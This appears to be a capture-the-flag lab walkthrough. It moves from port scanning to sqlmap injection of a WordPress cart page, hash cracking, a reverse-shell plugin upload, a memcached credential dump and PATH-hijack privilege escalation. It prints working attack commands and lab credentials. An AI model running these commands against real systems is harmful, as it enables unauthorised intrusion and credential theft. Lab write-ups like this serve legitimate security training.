rustscan
1 | rustscan -a 10.10.140.46 |
Open 10.10.140.46:22
Open 10.10.140.46:80
robots.txt
1 | User-agent: * |
http://10.10.140.46/comingreallysoon/
So we found this website.
http://10.10.140.46/it-next/
Gobuster
1 | gobuster dir -u http://10.10.140.46/it-next/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
SQL injection
List of dbs
1 | sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" --dbs |
List of tables
1 | sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress --tables |
Dump the table wp_user
1 | sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress -T wp_users -dump |
Let’s put thoses hashes into a file and crack them.
1 | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. |
1 | john hashs --wordlist=/home/peanutstick/Documents/arch_doc/CTF/Wordlist/rockyou.txt |
Login with wp_yura:soccer13
Wordpress
http://site.wekor.thm/wordpress/
You need to add it to your /etc/hosts
Revershell
With the plugin.
Then eip it:
1 | zip rev.zip revershell.php |
Upgrade the shell
1 | python3 -c 'import pty;pty.spawn("/bin/bash")' |
Then Ctrl + Z.
1 | stty raw -echo; fg # allow auto completion |
Privesc
there is the tool memcached-tool in /usr/share/memcached/scripts.
we can dump what’s runing on the port 11211.
1 | /usr/share/memcached/scripts/memcached-tool localhost:11211 dump |
Output.
1 | Dumping bucket 1 - 5 total items |
With the password OrkAiSC00L24/7$
Privesc to root
1 | sudo -l |
Let’s dig into this binary.
1 | strings /home/Orka/Desktop/bitcoin |
He use python.
1 | Orka@osboxes:~$ ls /usr/sbin/python |
Let’s create it.
1 | export PATH="/usr/sbin:$PATH" |
I’m root.
Other solution for privesc.
